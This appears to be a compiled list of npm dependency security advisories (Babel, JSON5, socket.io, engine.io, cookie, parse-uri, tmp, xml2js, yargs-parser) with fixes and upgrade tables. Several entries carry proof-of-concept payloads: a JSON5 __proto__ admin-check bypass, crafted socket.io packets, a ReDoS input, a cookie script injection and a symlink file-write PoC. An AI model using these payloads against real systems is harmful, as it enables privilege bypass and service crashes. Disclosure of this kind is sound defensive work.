All the vulnerabilities related to the version 3.2.1 of the package
Babel vulnerable to arbitrary code execution when compiling specifically crafted malicious code
Using Babel to compile code that was specifically crafted by an attacker can lead to arbitrary code execution during compilation, when using plugins that rely on the path.evaluate()
or path.evaluateTruthy()
internal Babel methods.
Known affected plugins are:
@babel/plugin-transform-runtime
@babel/preset-env
when using its useBuiltIns
option@babel/helper-define-polyfill-provider
, such as babel-plugin-polyfill-corejs3
, babel-plugin-polyfill-corejs2
, babel-plugin-polyfill-es-shims
, babel-plugin-polyfill-regenerator
No other plugins under the @babel/
namespace are impacted, but third-party plugins might be.
Users that only compile trusted code are not impacted.
The vulnerability has been fixed in @babel/traverse@7.23.2
.
Babel 6 does not receive security fixes anymore (see Babel's security policy), hence there is no patch planned for babel-traverse@6
.
@babel/traverse
to v7.23.2 or higher. You can do this by deleting it from your package manager's lockfile and re-installing the dependencies. @babel/core
>=7.23.2 will automatically pull in a non-vulnerable version.@babel/traverse
and are using one of the affected packages mentioned above, upgrade them to their latest version to avoid triggering the vulnerable code path in affected @babel/traverse
versions:
@babel/plugin-transform-runtime
v7.23.2@babel/preset-env
v7.23.2@babel/helper-define-polyfill-provider
v0.4.3babel-plugin-polyfill-corejs2
v0.4.6babel-plugin-polyfill-corejs3
v0.8.5babel-plugin-polyfill-es-shims
v0.10.0babel-plugin-polyfill-regenerator
v0.5.3Prototype Pollution in JSON5 via Parse Method
The parse
method of the JSON5 library before and including version 2.2.1
does not restrict parsing of keys named __proto__
, allowing specially crafted strings to pollute the prototype of the resulting object.
This vulnerability pollutes the prototype of the object returned by JSON5.parse
and not the global Object prototype, which is the commonly understood definition of Prototype Pollution. However, polluting the prototype of a single object can have significant security impact for an application if the object is later used in trusted operations.
This vulnerability could allow an attacker to set arbitrary and unexpected keys on the object returned from JSON5.parse
. The actual impact will depend on how applications utilize the returned object and how they filter unwanted keys, but could include denial of service, cross-site scripting, elevation of privilege, and in extreme cases, remote code execution.
This vulnerability is patched in json5 v2.2.2 and later. A patch has also been backported for json5 v1 in versions v1.0.2 and later.
Suppose a developer wants to allow users and admins to perform some risky operation, but they want to restrict what non-admins can do. To accomplish this, they accept a JSON blob from the user, parse it using JSON5.parse
, confirm that the provided data does not set some sensitive keys, and then performs the risky operation using the validated data:
const JSON5 = require('json5');
const doSomethingDangerous = (props) => {
if (props.isAdmin) {
console.log('Doing dangerous thing as admin.');
} else {
console.log('Doing dangerous thing as user.');
}
};
const secCheckKeysSet = (obj, searchKeys) => {
let searchKeyFound = false;
Object.keys(obj).forEach((key) => {
if (searchKeys.indexOf(key) > -1) {
searchKeyFound = true;
}
});
return searchKeyFound;
};
const props = JSON5.parse('{"foo": "bar"}');
if (!secCheckKeysSet(props, ['isAdmin', 'isMod'])) {
doSomethingDangerous(props); // "Doing dangerous thing as user."
} else {
throw new Error('Forbidden...');
}
If the user attempts to set the isAdmin
key, their request will be rejected:
const props = JSON5.parse('{"foo": "bar", "isAdmin": true}');
if (!secCheckKeysSet(props, ['isAdmin', 'isMod'])) {
doSomethingDangerous(props);
} else {
throw new Error('Forbidden...'); // Error: Forbidden...
}
However, users can instead set the __proto__
key to {"isAdmin": true}
. JSON5
will parse this key and will set the isAdmin
key on the prototype of the returned object, allowing the user to bypass the security check and run their request as an admin:
const props = JSON5.parse('{"foo": "bar", "__proto__": {"isAdmin": true}}');
if (!secCheckKeysSet(props, ['isAdmin', 'isMod'])) {
doSomethingDangerous(props); // "Doing dangerous thing as admin."
} else {
throw new Error('Forbidden...');
}
socket.io has an unhandled 'error' event
A specially crafted Socket.IO packet can trigger an uncaught exception on the Socket.IO server, thus killing the Node.js process.
node:events:502
throw err; // Unhandled 'error' event
^
Error [ERR_UNHANDLED_ERROR]: Unhandled error. (undefined)
at new NodeError (node:internal/errors:405:5)
at Socket.emit (node:events:500:17)
at /myapp/node_modules/socket.io/lib/socket.js:531:14
at process.processTicksAndRejections (node:internal/process/task_queues:77:11) {
code: 'ERR_UNHANDLED_ERROR',
context: undefined
}
| Version range | Needs minor update? |
|------------------|------------------------------------------------|
| 4.6.2...latest
| Nothing to do |
| 3.0.0...4.6.1
| Please upgrade to socket.io@4.6.2
(at least) |
| 2.3.0...2.5.0
| Please upgrade to socket.io@2.5.1
|
This issue is fixed by https://github.com/socketio/socket.io/commit/15af22fc22bc6030fcead322c106f07640336115, included in socket.io@4.6.2
(released in May 2023).
The fix was backported in the 2.x branch today: https://github.com/socketio/socket.io/commit/d30630ba10562bf987f4d2b42440fc41a828119c
As a workaround for the affected versions of the socket.io
package, you can attach a listener for the "error" event:
io.on("connection", (socket) => {
socket.on("error", () => {
// ...
});
});
If you have any questions or comments about this advisory:
Thanks a lot to Paul Taylor for the responsible disclosure.
CORS misconfiguration in socket.io
The package socket.io before 2.4.0 are vulnerable to Insecure Defaults due to CORS Misconfiguration. All domains are whitelisted by default.
Resource exhaustion in engine.io
Engine.IO before 4.0.0 and 3.6.0 allows attackers to cause a denial of service (resource consumption) via a POST request to the long polling transport.
Uncaught exception in engine.io
A specially crafted HTTP request can trigger an uncaught exception on the Engine.IO server, thus killing the Node.js process.
events.js:292
throw er; // Unhandled 'error' event
^
Error: read ECONNRESET
at TCP.onStreamRead (internal/stream_base_commons.js:209:20)
Emitted 'error' event on Socket instance at:
at emitErrorNT (internal/streams/destroy.js:106:8)
at emitErrorCloseNT (internal/streams/destroy.js:74:3)
at processTicksAndRejections (internal/process/task_queues.js:80:21) {
errno: -104,
code: 'ECONNRESET',
syscall: 'read'
}
This impacts all the users of the engine.io
package, including those who uses depending packages like socket.io
.
A fix has been released today (2022/11/20):
| Version range | Fixed version |
|-------------------|---------------|
| engine.io@3.x.y
| 3.6.1
|
| engine.io@6.x.y
| 6.2.1
|
For socket.io
users:
| Version range | engine.io
version | Needs minor update? |
|-----------------------------|---------------------|--------------------------------------------------------------------------------------------------------|
| socket.io@4.5.x
| ~6.2.0
| npm audit fix
should be sufficient |
| socket.io@4.4.x
| ~6.1.0
| Please upgrade to socket.io@4.5.x
|
| socket.io@4.3.x
| ~6.0.0
| Please upgrade to socket.io@4.5.x
|
| socket.io@4.2.x
| ~5.2.0
| Please upgrade to socket.io@4.5.x
|
| socket.io@4.1.x
| ~5.1.1
| Please upgrade to socket.io@4.5.x
|
| socket.io@4.0.x
| ~5.0.0
| Please upgrade to socket.io@4.5.x
|
| socket.io@3.1.x
| ~4.1.0
| Please upgrade to socket.io@4.5.x
(see here) |
| socket.io@3.0.x
| ~4.0.0
| Please upgrade to socket.io@4.5.x
(see here) |
| socket.io@2.5.0
| ~3.6.0
| npm audit fix
should be sufficient |
| socket.io@2.4.x
and below | ~3.5.0
| Please upgrade to socket.io@2.5.0
|
There is no known workaround except upgrading to a safe version.
If you have any questions or comments about this advisory:
engine.io
Thanks to Jonathan Neve for the responsible disclosure.
cookie accepts cookie name, path, and domain with out of bounds characters
The cookie name could be used to set other fields of the cookie, resulting in an unexpected cookie value. For example, serialize("userName=<script>alert('XSS3')</script>; Max-Age=2592000; a", value)
would result in "userName=<script>alert('XSS3')</script>; Max-Age=2592000; a=test"
, setting userName
cookie to <script>
and ignoring value
.
A similar escape can be used for path
and domain
, which could be abused to alter other fields of the cookie.
Upgrade to 0.7.0, which updates the validation for name
, path
, and domain
.
Avoid passing untrusted or arbitrary values for these fields, ensure they are set by the application instead of user input.
parse-uri Regular expression Denial of Service (ReDoS)
An issue in parse-uri v1.0.9 allows attackers to cause a Regular expression Denial of Service (ReDoS) via a crafted URL.
async function exploit() {
const parseuri = require("parse-uri");
// This input is designed to cause excessive backtracking in the regex
const craftedInput = 'http://example.com/' + 'a'.repeat(30000) + '?key=value';
const result = await parseuri(craftedInput);
}
await exploit();
Regular Expression Denial of Service in parsejson
Affected versions of parsejson
are vulnerable to a regular expression denial of service when parsing untrusted user input.
The parsejson
package has not been functionally updated since it was initially released.
Additionally, it provides functionality which is natively included in Node.js, and therefore the native JSON.parse()
should be used, for both performance and security reasons.
Insufficient validation when decoding a Socket.IO packet
A specially crafted Socket.IO packet can trigger an uncaught exception on the Socket.IO server, thus killing the Node.js process.
TypeError: Cannot convert object to primitive value
at Socket.emit (node:events:507:25)
at .../node_modules/socket.io/lib/socket.js:531:14
A fix has been released today (2023/05/22):
socket.io-parser@4.2.3
socket.io-parser@3.4.3
Another fix has been released for the 3.3.x
branch:
| socket.io
version | socket.io-parser
version | Needs minor update? |
|---------------------|---------------------------------------------------------------------------------------------------------|--------------------------------------|
| 4.5.2...latest
| ~4.2.0
(ref) | npm audit fix
should be sufficient |
| 4.1.3...4.5.1
| ~4.1.1
(ref) | Please upgrade to socket.io@4.6.x
|
| 3.0.5...4.1.2
| ~4.0.3
(ref) | Please upgrade to socket.io@4.6.x
|
| 3.0.0...3.0.4
| ~4.0.1
(ref) | Please upgrade to socket.io@4.6.x
|
| 2.3.0...2.5.0
| ~3.4.0
(ref) | npm audit fix
should be sufficient |
There is no known workaround except upgrading to a safe version.
If you have any questions or comments about this advisory:
Thanks to @rafax00 for the responsible disclosure.
Insufficient validation when decoding a Socket.IO packet
Due to improper type validation in the socket.io-parser
library (which is used by the socket.io
and socket.io-client
packages to encode and decode Socket.IO packets), it is possible to overwrite the _placeholder object which allows an attacker to place references to functions at arbitrary places in the resulting query object.
Example:
const decoder = new Decoder();
decoder.on("decoded", (packet) => {
console.log(packet.data); // prints [ 'hello', [Function: splice] ]
})
decoder.add('51-["hello",{"_placeholder":true,"num":"splice"}]');
decoder.add(Buffer.from("world"));
This bubbles up in the socket.io
package:
io.on("connection", (socket) => {
socket.on("hello", (val) => {
// here, "val" could be a function instead of a buffer
});
});
:warning: IMPORTANT NOTE :warning:
You need to make sure that the payload that you received from the client is actually a Buffer
object:
io.on("connection", (socket) => {
socket.on("hello", (val) => {
if (!Buffer.isBuffer(val)) {
socket.disconnect();
return;
}
// ...
});
});
If that's already the case, then you are not impacted by this issue, and there is no way an attacker could make your server crash (or escalate privileges, ...).
Example of values that could be sent by a malicious user:
Sample packet: 451-["hello",{"_placeholder":true,"num":10}]
io.on("connection", (socket) => {
socket.on("hello", (val) => {
// val is `undefined`
});
});
undefined
Sample packet: 451-["hello",{"_placeholder":true,"num":undefined}]
io.on("connection", (socket) => {
socket.on("hello", (val) => {
// val is `undefined`
});
});
Array
, like "push"Sample packet: 451-["hello",{"_placeholder":true,"num":"push"}]
io.on("connection", (socket) => {
socket.on("hello", (val) => {
// val is a reference to the "push" function
});
});
Object
, like "hasOwnProperty"Sample packet: 451-["hello",{"_placeholder":true,"num":"hasOwnProperty"}]
io.on("connection", (socket) => {
socket.on("hello", (val) => {
// val is a reference to the "hasOwnProperty" function
});
});
This should be fixed by:
socket.io-parser@4.2.1
socket.io-parser@4.0.5
socket.io-parser@3.4.2
socket.io-parser@3.3.3
socket.io
package| socket.io
version | socket.io-parser
version | Covered? |
|---------------------|---------------------------------------------------------------------------------------------------------|------------------------|
| 4.5.2...latest
| ~4.2.0
(ref) | Yes :heavy_check_mark: |
| 4.1.3...4.5.1
| ~4.0.4
(ref) | Yes :heavy_check_mark: |
| 3.0.5...4.1.2
| ~4.0.3
(ref) | Yes :heavy_check_mark: |
| 3.0.0...3.0.4
| ~4.0.1
(ref) | Yes :heavy_check_mark: |
| 2.3.0...2.5.0
| ~3.4.0
(ref) | Yes :heavy_check_mark: |
socket.io-client
package| socket.io-client
version | socket.io-parser
version | Covered? |
|----------------------------|----------------------------------------------------------------------------------------------------------------|------------------------------------|
| 4.5.0...latest
| ~4.2.0
(ref) | Yes :heavy_check_mark: |
| 4.3.0...4.4.1
| ~4.1.1
(ref) | No, but the impact is very limited |
| 3.1.0...4.2.0
| ~4.0.4
(ref) | Yes :heavy_check_mark: |
| 3.0.5
| ~4.0.3
(ref) | Yes :heavy_check_mark: |
| 3.0.0...3.0.4
| ~4.0.1
(ref) | Yes :heavy_check_mark: |
| 2.2.0...2.5.0
| ~3.3.0
(ref) | Yes :heavy_check_mark: |
Resource exhaustion in socket.io-parser
The socket.io-parser
npm package before versions 3.3.2 and 3.4.1 allows attackers to cause a denial of service (memory consumption) via a large packet because a concatenation approach is used.
tmp allows arbitrary temporary file / directory write via symbolic link dir
parameter
tmp@0.2.3
is vulnerable to an Arbitrary temporary file / directory write via symbolic link dir
parameter.
According to the documentation there are some conditions that must be held:
// https://github.com/raszi/node-tmp/blob/v0.2.3/README.md?plain=1#L41-L50
Other breaking changes, i.e.
- template must be relative to tmpdir
- name must be relative to tmpdir
- dir option must be relative to tmpdir //<-- this assumption can be bypassed using symlinks
are still in place.
In order to override the system's tmpdir, you will have to use the newly
introduced tmpdir option.
// https://github.com/raszi/node-tmp/blob/v0.2.3/README.md?plain=1#L375
* `dir`: the optional temporary directory that must be relative to the system's default temporary directory.
absolute paths are fine as long as they point to a location under the system's default temporary directory.
Any directories along the so specified path must exist, otherwise a ENOENT error will be thrown upon access,
as tmp will not check the availability of the path, nor will it establish the requested path for you.
Related issue: https://github.com/raszi/node-tmp/issues/207.
The issue occurs because _resolvePath
does not properly handle symbolic link when resolving paths:
// https://github.com/raszi/node-tmp/blob/v0.2.3/lib/tmp.js#L573-L579
function _resolvePath(name, tmpDir) {
if (name.startsWith(tmpDir)) {
return path.resolve(name);
} else {
return path.resolve(path.join(tmpDir, name));
}
}
If the dir
parameter points to a symlink that resolves to a folder outside the tmpDir
, it's possible to bypass the _assertIsRelative
check used in _assertAndSanitizeOptions
:
// https://github.com/raszi/node-tmp/blob/v0.2.3/lib/tmp.js#L590-L609
function _assertIsRelative(name, option, tmpDir) {
if (option === 'name') {
// assert that name is not absolute and does not contain a path
if (path.isAbsolute(name))
throw new Error(`${option} option must not contain an absolute path, found "${name}".`);
// must not fail on valid .<name> or ..<name> or similar such constructs
let basename = path.basename(name);
if (basename === '..' || basename === '.' || basename !== name)
throw new Error(`${option} option must not contain a path, found "${name}".`);
}
else { // if (option === 'dir' || option === 'template') {
// assert that dir or template are relative to tmpDir
if (path.isAbsolute(name) && !name.startsWith(tmpDir)) {
throw new Error(`${option} option must be relative to "${tmpDir}", found "${name}".`);
}
let resolvedPath = _resolvePath(name, tmpDir); //<---
if (!resolvedPath.startsWith(tmpDir))
throw new Error(`${option} option must be relative to "${tmpDir}", found "${resolvedPath}".`);
}
}
The following PoC demonstrates how writing a tmp file on a folder outside the tmpDir
is possible.
Tested on a Linux machine.
tmpDir
that points to a directory outside of itmkdir $HOME/mydir1
ln -s $HOME/mydir1 ${TMPDIR:-/tmp}/evil-dir
ls -lha $HOME/mydir1 | grep "tmp-"
node main.js
File: /tmp/evil-dir/tmp-26821-Vw87SLRaBIlf
test 1: ENOENT: no such file or directory, open '/tmp/mydir1/tmp-[random-id]'
test 2: dir option must be relative to "/tmp", found "/foo".
test 3: dir option must be relative to "/tmp", found "/home/user/mydir1".
$HOME/mydir1
(outside the tmpDir
):ls -lha $HOME/mydir1 | grep "tmp-"
-rw------- 1 user user 0 Apr X XX:XX tmp-[random-id]
main.js
// npm i tmp@0.2.3
const tmp = require('tmp');
const tmpobj = tmp.fileSync({ 'dir': 'evil-dir'});
console.log('File: ', tmpobj.name);
try {
tmp.fileSync({ 'dir': 'mydir1'});
} catch (err) {
console.log('test 1:', err.message)
}
try {
tmp.fileSync({ 'dir': '/foo'});
} catch (err) {
console.log('test 2:', err.message)
}
try {
const fs = require('node:fs');
const resolved = fs.realpathSync('/tmp/evil-dir');
tmp.fileSync({ 'dir': resolved});
} catch (err) {
console.log('test 3:', err.message)
}
A Potential fix could be to call fs.realpathSync
(or similar) that resolves also symbolic links.
function _resolvePath(name, tmpDir) {
let resolvedPath;
if (name.startsWith(tmpDir)) {
resolvedPath = path.resolve(name);
} else {
resolvedPath = path.resolve(path.join(tmpDir, name));
}
return fs.realpathSync(resolvedPath);
}
Arbitrary temporary file / directory write via symlink
xml2js is vulnerable to prototype pollution
xml2js versions before 0.5.0 allows an external attacker to edit or add new properties to an object. This is possible because the application does not properly validate incoming JSON keys, thus allowing the __proto__
property to be edited.
yargs-parser Vulnerable to Prototype Pollution
Affected versions of yargs-parser
are vulnerable to prototype pollution. Arguments are not properly sanitized, allowing an attacker to modify the prototype of Object
, causing the addition or modification of an existing property that will exist on all objects.
Parsing the argument --foo.__proto__.bar baz'
adds a bar
property with value baz
to all objects. This is only exploitable if attackers have control over the arguments being passed to yargs-parser
.
Upgrade to versions 13.1.2, 15.0.1, 18.1.1 or later.